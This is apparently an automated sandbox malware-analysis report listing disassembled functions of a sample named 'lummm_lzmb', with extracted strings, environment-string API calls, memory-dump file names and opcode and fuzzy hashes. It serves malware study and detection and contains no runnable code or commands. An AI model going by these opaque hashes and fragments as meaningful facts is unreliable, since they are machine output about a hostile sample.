Function 007CB412 Relevance: 9.4, Strings: 7, Instructions: 687COMMON

Download Yara Rule

Strings

X0T6, xrefs: 007CBA70
K4Y:, xrefs: 007CB83E
G G&, xrefs: 007CBA28
G G&, xrefs: 007CB853
Z<Q", xrefs: 007CB84C
X0T6, xrefs: 007CB837
B@, xrefs: 007CB9D4

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: B@$G G&$G G&$K4Y:$X0T6$X0T6$Z<Q"
API String ID: 0-2011696338
Opcode ID: 5792e0b5c2d0f6a72859c98bbe6532679934091b82dc093f1c8b07bb2d80b21f
Instruction ID: d7a6ce25ff75467c55d3eb4b079c5d5c90df7e1a417b7c2c1504e0d4484db145
Opcode Fuzzy Hash: 5792e0b5c2d0f6a72859c98bbe6532679934091b82dc093f1c8b07bb2d80b21f
Instruction Fuzzy Hash: C6025672A00610CBC724CF68C892BBAB7F2EF95324F19915DE895AB395E7789D01C790

Function 007D56A0 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 410COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 007D57D6
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 007D583F

Strings

<jkl, xrefs: 007D7034
X2r0, xrefs: 007D56B3
iv, xrefs: 007D5722

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: <jkl$X2r0$iv
API String ID: 237503144-776811118
Opcode ID: 9098280581ffc51eb3e99989a8529dc2fc408132f753480b6ebe2dc4354f28a2
Instruction ID: cde795ba6f5c3133558688b47d881fb6497b60df940c516aa7c69f92d2a20fc4
Opcode Fuzzy Hash: 9098280581ffc51eb3e99989a8529dc2fc408132f753480b6ebe2dc4354f28a2
Instruction Fuzzy Hash: 45D101B1A083149BDB14CFA8EC817EEBBB5FF85310F10452DE951AB381D7799806CB95

Function 007D9BB2 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 506COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 007D9C6C
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 007D9CCE

Strings

|.A6, xrefs: 007DA01D

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: |.A6
API String ID: 237503144-346439695
Opcode ID: 4c3b334acbaad083a9e517a9a8db3e1410476774faddbc7e903e9d2ee90da695
Instruction ID: 4aef37d2b59f22191551e1602b531b2e198a53ebe6fa6fb4ecb23772ad89fb13
Opcode Fuzzy Hash: 4c3b334acbaad083a9e517a9a8db3e1410476774faddbc7e903e9d2ee90da695
Instruction Fuzzy Hash: B3F1E272E002258FCB14CFA8C8816AEBBF1FF85314F198169D955AB391D778AC42CB90

Function 007DA9E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 267COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,B777B591), ref: 007DAB0F
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,B777B591,B777B591), ref: 007DABCC

Strings

qrs, xrefs: 007DAA7B

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: qrs
API String ID: 237503144-2859022563
Opcode ID: b89b96b975e34c7164bbb5fe2d7674dea3b6c13fafe24fc852829e44b233e1da
Instruction ID: f53346ff44af6cbd13a61634059488d91e270cf8ec0a34e6c1bf4a315bb74cf7
Opcode Fuzzy Hash: b89b96b975e34c7164bbb5fe2d7674dea3b6c13fafe24fc852829e44b233e1da
Instruction Fuzzy Hash: E48133B1E14218EFDF14CFA8EC41BAEB7B5FB08310F544169E509AB285D7785E02CB95

Function 007D5629 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000E,00000000,?,?), ref: 007D5666

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: de0071c7b44621821b13ec61dc022ed0602546f971a26c3e9fb1f48eb0b3c4bb
Instruction ID: 806214ecdcdcc81df1f95f264dac201726c225cba8ef0e7532f918e52138ad42
Opcode Fuzzy Hash: de0071c7b44621821b13ec61dc022ed0602546f971a26c3e9fb1f48eb0b3c4bb
Instruction Fuzzy Hash: 2151F5B0E402049FDB149F6CD882BAE7BB2FB45320F59426DE951AF391D7748802CBD6

Function 007DE063 Relevance: 4.0, Strings: 3, Instructions: 241COMMON

Download Yara Rule

Strings

3u0, xrefs: 007DE3D9
y, xrefs: 007DE2DA
;, xrefs: 007DE39F

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: 3u0$;$y
API String ID: 0-3329705311
Opcode ID: ce187d09ff064e086078b02071235265cfca83e2aad0df32fe83818fcc44ceef
Instruction ID: 95b2fde1c11a6c9083d27c98a9ecd896f2148169326d3809ad38c518ca153735
Opcode Fuzzy Hash: ce187d09ff064e086078b02071235265cfca83e2aad0df32fe83818fcc44ceef
Instruction Fuzzy Hash: CC61F77050C3D28BD316CF36806037BFBE0AF96319F18895EE4D69B381D639D90A8B52

Function 007C4460 Relevance: 3.4, Strings: 2, Instructions: 905COMMON

Download Yara Rule

Strings

}K, xrefs: 007C4687
NP,?, xrefs: 007C4870

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: NP,?$}K
API String ID: 0-1836352192
Opcode ID: 286b4fe20db51ee438af71eef1f3101c955bf91052e8bfa902748e0c95d122cf
Instruction ID: 2a196fdf8bf0b0451cdee86fbc2a19e680db3825371ab581ed1d2f43abd15f45
Opcode Fuzzy Hash: 286b4fe20db51ee438af71eef1f3101c955bf91052e8bfa902748e0c95d122cf
Instruction Fuzzy Hash: B94215B1608200DBD7289F24EC62B3B73F1EF85314F148A2CE596972E1EB79AC15C756

Function 007CBCC0 Relevance: 2.9, Strings: 2, Instructions: 390COMMON

Download Yara Rule

Strings

Ryz{, xrefs: 007CC075
&', xrefs: 007CBDA9

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: &'$Ryz{
API String ID: 0-936034988
Opcode ID: 3317d9c5bcdb8b72094187dcba1f3aaed6f755ece732880aea739b77c1be1792
Instruction ID: fe4dde12ae1b14a216a11f051b9639beb22aa6be4a040f83ff1c5fbc1843f461
Opcode Fuzzy Hash: 3317d9c5bcdb8b72094187dcba1f3aaed6f755ece732880aea739b77c1be1792
Instruction Fuzzy Hash: 02A1B1B15083118BD728DF24CC62A7BB7F1EF91324F198A1CF8968B391E3389945C796

Function 007C7AA7 Relevance: 2.7, Strings: 2, Instructions: 161COMMON

Download Yara Rule

Strings

p, xrefs: 007C7AA7
C=z?, xrefs: 007C7BCC

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: C=z?$p
API String ID: 0-3957839769
Opcode ID: 19919dc38f31202922eec585d60fca02c045acf954a5d658ecd7237308674a18
Instruction ID: f9b6f33ca6cbeea89255cc1ee12923e5fd44aac1816682f6f97b798063a45485
Opcode Fuzzy Hash: 19919dc38f31202922eec585d60fca02c045acf954a5d658ecd7237308674a18
Instruction Fuzzy Hash: 5A41D7B16083418BC7398F2488517FBB7A1EF9A314F09865CD4D69B381EA385C05CBA5

Function 007D8150 Relevance: 2.6, Strings: 2, Instructions: 71COMMON

Download Yara Rule

Strings

jgtu, xrefs: 007D81EE
jgtu, xrefs: 007D8235

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: jgtu$jgtu
API String ID: 0-4040991803
Opcode ID: f6d5bfe14a49b8c78636b86ae5e04abef1dc6e7ac8fc1a83761a3e5fb304170e
Instruction ID: 549831d85fa15f1998b0780409252ba50ef816363415e5bbb4e4fad0146a7027
Opcode Fuzzy Hash: f6d5bfe14a49b8c78636b86ae5e04abef1dc6e7ac8fc1a83761a3e5fb304170e
Instruction Fuzzy Hash: BE21467281C3908BD324CF28C84479FFBB2ABC7318F08861CE5D497295DA79C8498B42

Function 007EB546 Relevance: 2.0, Strings: 1, Instructions: 767COMMON

Download Yara Rule

Strings

(])2, xrefs: 007EBCE6

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: (])2
API String ID: 0-2889296709
Opcode ID: cf20b39c2ae32e66a0fedbe4c7853bfce0644e72a52c89d6a5f51f8e5ae3c4f9
Instruction ID: 9c19c3e68cfb89ade48eac2255001d0e3cce52aba4ccabfffa38fc21c595bfc5
Opcode Fuzzy Hash: cf20b39c2ae32e66a0fedbe4c7853bfce0644e72a52c89d6a5f51f8e5ae3c4f9
Instruction Fuzzy Hash: 4B32D036E11226CBCB188F78D8912FEB7B2FF89310F19C569CA01A7390E7789955C794

Function 007D5B00 Relevance: 1.7, APIs: 1, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f03f59b2720370a18e7ee2f1e388ad9a57139b5cebf0dc299db70f348667089c
Instruction ID: d8e5edfbfbcecda4de669441f487e6f204750710bce36544511dbac492c3b74f
Opcode Fuzzy Hash: f03f59b2720370a18e7ee2f1e388ad9a57139b5cebf0dc299db70f348667089c
Instruction Fuzzy Hash: 4F81FEB1908254DFEB048F68EC517BEBBB0FF49320F10496AE951E7391D7799901CBA1

Function 007DCCE0 Relevance: 1.6, Strings: 1, Instructions: 392COMMON

Download Yara Rule

Strings

", xrefs: 007DCFB8

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 73e599a4cc1846490f4791ba201374a33f3f7993704554c56ecda1ace70879bb
Instruction ID: 5f73415aefba0e87d52d9015c2a1f2890e2513eb26c06f8c1c4bce6380d581d7
Opcode Fuzzy Hash: 73e599a4cc1846490f4791ba201374a33f3f7993704554c56ecda1ace70879bb
Instruction Fuzzy Hash: E0C124B2A083059FDB258E64C85476BBBF6ABC0350F19852FE8998B381E738DD45C7D1

Function 007F1270 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

Ptu*, xrefs: 007F12E0

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: Ptu*
API String ID: 0-809653335
Opcode ID: f9528724f63eea5f90ddddbb75700d3c0b7201739d8137e2cbf6c184d09fb035
Instruction ID: 23b342c76a3cdf47dbe44f8e1133b5f46c61f59be6d68d439b3c0206da8eaf87
Opcode Fuzzy Hash: f9528724f63eea5f90ddddbb75700d3c0b7201739d8137e2cbf6c184d09fb035
Instruction Fuzzy Hash: 7081E175604315CBC728DF18D890A3AB3A2FFD9360F55862CEA964B3A5D739EC11CB41

Function 007DD1A0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 007DD39E

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 6bdbaae1ac0a0331ba9b4e83aec79697a72239c6423ebf4fa46118d737ec7191
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: AE71C332A083559BD734CE2CC48431EBBF2BBC5750F29C52EE8989B395D279ED458782

Function 007D9F40 Relevance: 1.5, Strings: 1, Instructions: 207COMMON

Download Yara Rule

Strings

|.A6, xrefs: 007DA01D

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: |.A6
API String ID: 0-346439695
Opcode ID: 4827807eb34e6fb3234918225d344bff5bc6effb907c7cea69cdc319c780f277
Instruction ID: 91aefbff6f10eb0fd40ecb1f5e0a47b8d457bd077b6fbde3374cdbffc4f25ecf
Opcode Fuzzy Hash: 4827807eb34e6fb3234918225d344bff5bc6effb907c7cea69cdc319c780f277
Instruction Fuzzy Hash: E5510272D14314CBCB208FA8DC916BA77B0FF45314F19416EE946AB361E379AD01CB94

Function 007CA880 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

8Q!., xrefs: 007CA8C8

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: 8Q!.
API String ID: 0-703353849
Opcode ID: ba5e6707c3f7d182125ec430e8a2c3695e96c43f2887de655596939b32d2a2d1
Instruction ID: ffdbad2adb03108d3abc3d71968793a7b8d6ad54a66831d88fd2441a34794b2d
Opcode Fuzzy Hash: ba5e6707c3f7d182125ec430e8a2c3695e96c43f2887de655596939b32d2a2d1
Instruction Fuzzy Hash: 5E1159719083909BD71A8F358CA17377BE2AF93309F58D49CE0C29B281D6388906CB46

Function 007B73C0 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a5d6da9a32e8284ed24a6f9a3190964215a4d155afe2b0f1481f8d8abef0a7c
Instruction ID: a42cf6c350167680940a94e941c00a4c77c84f8c06fa9b112868d192208059a3
Opcode Fuzzy Hash: 6a5d6da9a32e8284ed24a6f9a3190964215a4d155afe2b0f1481f8d8abef0a7c
Instruction Fuzzy Hash: 8022B67160C7118BC729DF18E8857EBB3E1EFC4309F29493DCA8697241D738A955CB92

Function 007F0370 Relevance: .6, Instructions: 640COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e969eae893d37339cfd479c4a8f3f3ef3644014f7380f80dfc36293ee1a25a
Instruction ID: d85856d35a17f10592b3e5a545485691ce3320ee63bd7c4b3de655c03d860c17
Opcode Fuzzy Hash: a8e969eae893d37339cfd479c4a8f3f3ef3644014f7380f80dfc36293ee1a25a
Instruction Fuzzy Hash: E7120276708251CFC708CF28E89057AB3E2FB89315F1AC87DD58987352D679E851CB86

Function 007F0480 Relevance: .6, Instructions: 575COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bec2697fa152665192a0613ff138975a8ba3a4c872799ef76ecf5d9cba3406d2
Instruction ID: 3469877f4c7d39cf153fd385ef8abb39d75e3f2ffc27664d1e5324006f0ab1fb
Opcode Fuzzy Hash: bec2697fa152665192a0613ff138975a8ba3a4c872799ef76ecf5d9cba3406d2
Instruction Fuzzy Hash: 25F10376708251CFC708CF28E8A057AB3E2EBC9315F1A847DD58AC3352DA79E855CB46

Function 007B5860 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfc5f6c655f64a409e824d411c3f71920b4185bdaaaf9c23b699d68776ac4095
Instruction ID: 4515504d0538cd8f1e5a3c11969c47c24d34abfce3952e740bf3a69b7d77a9cd
Opcode Fuzzy Hash: dfc5f6c655f64a409e824d411c3f71920b4185bdaaaf9c23b699d68776ac4095
Instruction Fuzzy Hash: ABF1BD356087418FD724DF29C8817ABFBE6AFD9300F08892CE5D587352E679E944CB92

Function 007D23C0 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953109797.0000000000803000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc3b097e20d6fca2898f977e4a7dc638baa3cb5b10c293e7c97e9efa08bc966
Instruction ID: 5ebdc9983d55c348736da85eb2ec57f4b7d26724dfa5b4ad4b471c750cde3b1e
Opcode Fuzzy Hash: 3fc3b097e20d6fca2898f977e4a7dc638baa3cb5b10c293e7c97e9efa08bc966
Instruction Fuzzy Hash: 8B51E871A042118BDB149F24DC9277773F1EFA5324F08566DE8968B392F73CA916C351

Function 007EE4C4 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1952847140.00000000007B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000001.00000002.1952819656.00000000007B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953031284.00000000007F3000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1953068218.00000000007F5000.00000040.00000400.00020000.00000000.sdmpDownload File
